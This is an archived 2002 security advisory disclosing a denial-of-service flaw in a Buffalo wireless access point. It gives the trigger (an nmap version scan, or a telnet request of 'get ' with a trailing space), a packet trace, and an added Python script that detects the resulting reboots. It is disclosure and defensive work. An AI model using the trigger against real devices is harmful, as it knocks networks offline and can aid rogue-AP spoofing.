Buffalo AP Denial of Service

From: Andrei Mikhailovsky (andreiat_private)
Date: Wed Nov 13 2002 - 11:39:12 PST

    Arhont Ltd.     - Information Security
    
    Arhont Advisory by:             Andrei Mikhailovsky
    (www.arhont.com)
    Advisory:                       Buffalo AP 
    AP Model Name:                  WLA-L11G Ver.2.31
    Wireless Firmware:              WLI-PCM-L11G Ver.6.14
    Model Specific:                 Other versions of Buffalo APs might be vulnerable
    Manufacturer site:              http://www.buffalotech.com
    Manufacturer contact:           infoat_private
    Contact Date:                   25/10/2002
    
    
    DETAILS:
    
    While performing network testing, we found a
    Buffalo Access Point (WLA-L11G Ver.2.31) vulnerable to
    a Denial of Service (DoS) attack.  Simply using a network
    scanning tool such as nmap (www.insecure.org) with version
    grabbing in the following manner restarts the AP:
    
    $ nmap -sVVV -p 80 192.168.177.250
    
    where 192.168.177.250 is the IP address of the Buffalo AP.
    
    Analysing network traffic shows the following:
    
    14:16:14.622714 192.168.177.7.34968 > 192.168.177.250.www: S [tcp sum ok] 4001152576:4001152576(0) win 5840 <mss 1460,sackOK,timestamp 5143788 0,nop,wscale 0> (DF) [tos 0x10]  (ttl 64, id 49836, len 60)
    0x0000   4510 003c c2ac 4000 4006 5bad c0a8 4d07      E..<..@.@.[...M.
    0x0010   c0a8 4dfa 8898 0050 ee7c be40 0000 0000      ..M....P.|.@....
    0x0020   a002 16d0 6204 0000 0204 05b4 0402 080a      ....b...........
    0x0030   004e 7cec 0000 0000 0103 0300                .N|.........
    
    14:16:14.623498 192.168.177.250.www > 192.168.177.7.34968: S [tcp sum ok] 51008176:51008176(0) ack 4001152577 win 16000 <mss 1460> (ttl 30, id 2, len 44)
    0x0000   4500 002c 0002 0000 1e06 8078 c0a8 4dfa      E..,.......x..M.
    0x0010   c0a8 4d07 0050 8898 030a 52b0 ee7c be41      ..M..P....R..|.A
    0x0020   6012 3e80 b1e2 0000 0204 05b4 0000           `.>...........
    
    14:16:14.623539 192.168.177.7.34968 > 192.168.177.250.www: . [tcp sum ok] 1:1(0) ack 1 win 5840 (DF) [tos 0x10]  (ttl 64, id 49837, len 40)
    0x0000   4510 0028 c2ad 4000 4006 5bc0 c0a8 4d07      E..(..@.@.[...M.
    0x0010   c0a8 4dfa 8898 0050 ee7c be41 030a 52b1      ..M....P.|.A..R.
    0x0020   5010 16d0 f14f 0000                          P....O..
    
    14:16:15.402518 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 1:7(6) ack 1 win 5840 (DF) [tos 0x10]  (ttl 64, id 49838, len 46)
    0x0000   4510 002e c2ae 4000 4006 5bb9 c0a8 4d07      E.....@.@.[...M.
    0x0010   c0a8 4dfa 8898 0050 ee7c be41 030a 52b1      ..M....P.|.A..R.
    0x0020   5018 16d0 08b2 0000 6765 7420 0d0a           P.......get...
    
    14:16:15.647578 192.168.177.250.www > 192.168.177.7.34968: . [tcp sum ok] 1:1(0) ack 7 win 16000 (ttl 30, id 3, len 40)
    0x0000   4500 0028 0003 0000 1e06 807b c0a8 4dfa      E..(.......{..M.
    0x0010   c0a8 4d07 0050 8898 030a 52b1 ee7c be47      ..M..P....R..|.G
    0x0020   5010 3e80 c999 0000 0000 0000 0000           P.>...........
    
    14:16:15.647639 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10]  (ttl 64, id 49839, len 42)
    0x0000   4510 002a c2af 4000 4006 5bbc c0a8 4d07      E..*..@.@.[...M.
    0x0010   c0a8 4dfa 8898 0050 ee7c be47 030a 52b1      ..M....P.|.G..R.
    0x0020   5018 16d0 e435 0000 0d0a                     P....5....
    
    14:16:16.358599 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10]  (ttl 64, id 49840, len 42)
    0x0000   4510 002a c2b0 4000 4006 5bbb c0a8 4d07      E..*..@.@.[...M.
    0x0010   c0a8 4dfa 8898 0050 ee7c be47 030a 52b1      ..M....P.|.G..R.
    0x0020   5018 16d0 e435 0000 0d0a                     P....5....
    
    14:16:17.750198 arp who-has 192.168.177.250 tell 192.168.177.250
    0x0000   0001 0800 0604 0001 0007 4006 0656 c0a8      ..........@..V..
    0x0010   4dfa 0000 0000 0000 c0a8 4dfa 0000 0000      M.........M.....
    0x0020   0000 0000 0000 0000 0000 0000 0000           ..............
    
    14:16:17.798596 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10]  (ttl 64, id 49841, len 42)
    0x0000   4510 002a c2b1 4000 4006 5bba c0a8 4d07      E..*..@.@.[...M.
    0x0010   c0a8 4dfa 8898 0050 ee7c be47 030a 52b1      ..M....P.|.G..R.
    0x0020   5018 16d0 e435 0000 0d0a                     P....5....
    
    14:16:20.274463 arp who-has 192.168.177.7 tell 192.168.177.250
    0x0000   0001 0800 0604 0001 0007 4006 0656 c0a8      ..........@..V..
    0x0010   4dfa 0000 0000 0000 c0a8 4d07 0000 0000      M.........M.....
    0x0020   0000 0000 0000 0000 0000 0000 0000           ..............
    
    14:16:20.274488 arp reply 192.168.177.7 is-at 0:4:5a:63:a4:be
    0x0000   0001 0800 0604 0002 0004 5a63 a4be c0a8      ..........Zc....
    0x0010   4d07 0007 4006 0656 c0a8 4dfa                M...@..V..M.
    
    14:16:20.275495 192.168.177.250.www > 192.168.177.7.34968: FR [tcp sum ok] 51008177:51008177(0) win 0 (ttl 30, id 1, len 40)
    0x0000   4500 0028 0001 0000 1e06 807d c0a8 4dfa      E..(.......}..M.
    0x0010   c0a8 4d07 0050 8898 030a 52b1 0000 0000      ..M..P....R.....
    0x0020   5005 0000 b4e9 0000 0000 0000 0000           P.............
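From a monitoring point of view, the trace above contains a usable restart signature that does not depend on the triggering request: the AP answers with IP ids 2 and 3, then emits a gratuitous ARP for its own address (who-has 192.168.177.250 tell 192.168.177.250), and its next packet carries id 1 and a RST, i.e. the id counter started over. The following Python script is an added example for this archive page, not code from the advisory or from Arhont Ltd.; it parses tcpdump summary lines in the format shown above, flags that gratuitous-ARP-plus-id-reset pattern as a suspected reboot, and lists which hosts had sessions to the AP's web port just before. The correlation window, the id-wrap guard and the web-port set are assumptions of the example, not values from the advisory.

```python
"""Reboot-signature detector for tcpdump summary lines (added example)."""
import re
from collections import defaultdict

# tcpdump 3.x summary line formats as printed in the advisory (hex dumps omitted).
IP_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) > (?P<dst>\S+): (?P<flags>\S+) .*"
    r"\(ttl \d+, id (?P<id>\d+), len \d+\)$"
)
ARP_RE = re.compile(r"^(?P<ts>\S+) arp who-has (?P<target>\S+) tell (?P<sender>\S+)$")

WEB_PORTS = {"www", "http", "80"}   # assumption: ports counted as "the AP's web port"

# Constructed input: the summary lines of the advisory's trace, with the hex
# dump lines dropped and the archive's line wrapping rejoined.
TRACE = """\
14:16:14.622714 192.168.177.7.34968 > 192.168.177.250.www: S [tcp sum ok] 4001152576:4001152576(0) win 5840 <mss 1460,sackOK,timestamp 5143788 0,nop,wscale 0> (DF) [tos 0x10] (ttl 64, id 49836, len 60)
14:16:14.623498 192.168.177.250.www > 192.168.177.7.34968: S [tcp sum ok] 51008176:51008176(0) ack 4001152577 win 16000 <mss 1460> (ttl 30, id 2, len 44)
14:16:14.623539 192.168.177.7.34968 > 192.168.177.250.www: . [tcp sum ok] 1:1(0) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49837, len 40)
14:16:15.402518 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 1:7(6) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49838, len 46)
14:16:15.647578 192.168.177.250.www > 192.168.177.7.34968: . [tcp sum ok] 1:1(0) ack 7 win 16000 (ttl 30, id 3, len 40)
14:16:15.647639 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49839, len 42)
14:16:16.358599 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49840, len 42)
14:16:17.750198 arp who-has 192.168.177.250 tell 192.168.177.250
14:16:17.798596 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49841, len 42)
14:16:20.274463 arp who-has 192.168.177.7 tell 192.168.177.250
14:16:20.274488 arp reply 192.168.177.7 is-at 0:4:5a:63:a4:be
14:16:20.275495 192.168.177.250.www > 192.168.177.7.34968: FR [tcp sum ok] 51008177:51008177(0) win 0 (ttl 30, id 1, len 40)
"""


def ts_seconds(ts: str) -> float:
    """'14:16:14.622714' -> seconds since midnight."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def split_endpoint(ep: str):
    """'192.168.177.250.www' -> ('192.168.177.250', 'www')."""
    host, _, port = ep.rpartition(".")
    return host, port


def find_reboots(lines, window=10.0, wrap_guard=60000):
    """Return one dict per suspected reboot: the packet time, the host, and
    the clients that talked to its web port in the `window` seconds before
    the gratuitous ARP that marks the restart (window is an assumption)."""
    last_id = {}                      # host -> last IP id seen from it
    garp_at = {}                      # host -> time of its last gratuitous ARP
    web_clients = defaultdict(list)   # server -> [(time, client)]
    events = []
    for line in lines:
        m = ARP_RE.match(line)
        if m:
            if m["target"] == m["sender"]:   # host announcing its own address
                garp_at[m["sender"]] = ts_seconds(m["ts"])
            continue
        m = IP_RE.match(line)
        if not m:
            continue                         # e.g. "arp reply" lines
        t = ts_seconds(m["ts"])
        src, _ = split_endpoint(m["src"])
        dst, dport = split_endpoint(m["dst"])
        if dport in WEB_PORTS:
            web_clients[dst].append((t, src))
        new_id = int(m["id"])
        prev = last_id.get(src)
        # Heuristic: a sequential IP id counter only goes backwards on wrap
        # (near 65535) or after a restart; treat any other decrease as a restart.
        if prev is not None and new_id < prev and prev < wrap_guard:
            g = garp_at.get(src)
            if g is not None and 0 <= t - g <= window:
                clients = sorted({c for ct, c in web_clients[src] if g - window <= ct <= g})
                events.append({"time": m["ts"], "host": src, "clients": clients})
        last_id[src] = new_id
    return events


def describe(events):
    """Human-readable one-liners for the events returned by find_reboots()."""
    return [f"{e['time']} {e['host']} restarted; web clients just before: "
            + (", ".join(e["clients"]) or "none") for e in events]


if __name__ == "__main__":
    for report in describe(find_reboots(TRACE.splitlines())):
        print(report)
```

Run against the trace, the script reports one restart of 192.168.177.250 at 14:16:20.275495 with 192.168.177.7 as the only client that had talked to its web port beforehand. The id-reset check on its own would also fire for an AP that was power-cycled by hand, so the gratuitous ARP is required as well; a deployment feeding real captures would replace TRACE with the output of tcpdump on the AP's segment.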
    
    
    Attacks can also be reproduced manually via telnet:
    
    andreiat_private:~$ telnet 192.168.177.250 80
    Trying 192.168.177.250...
    Connected to 192.168.177.250 (192.168.177.250).
    Escape character is '^]'.
    GET / HTTP/1.0
    
    
    
    Connection closed by foreign host.
    
    and
    
    andreiat_private:~$ telnet 192.168.177.250 80
    Trying 192.168.177.250...
    Connected to 192.168.177.250 (192.168.177.250).
    Escape character is '^]'.
    get 
    
    Connection closed by foreign host.
    
    (where there is a <space> after get; without the
    <space>, the AP doesn't restart)
    
    Impact:  This vulnerability can be used by an
    attacker to restart the AP.  This might be useful if
    the configuration files have been changed by the
    attacker and an AP restart is required to apply
    the changes.  It is also possible to use this
    attack to spoof an AP and make the clients connect to a
    rogue or spoofed AP instead of the legitimate one.
    
    Risk Factor: Medium/High
    
    According to Arhont Ltd. policy, all vulnerabilities
    and security issues found are reported to the
    manufacturer 7 days before being released to the public
    domain (such as CERT and BUGTRAQ).
    
    If you would like more information about this
    issue, please do not hesitate to contact the Arhont team.
    
    
    Regards,
    
    Andrei Mikhailovsky
    Arhont Ltd.
    http://www.arhont.com
    GnuPG Keyserver: blackhole.pca.dfn.de
    GnuPG Key:       0x178F548C
    
    This archive was generated by hypermail 2b30 : Sat Nov 16 2002 - 00:59:14 PST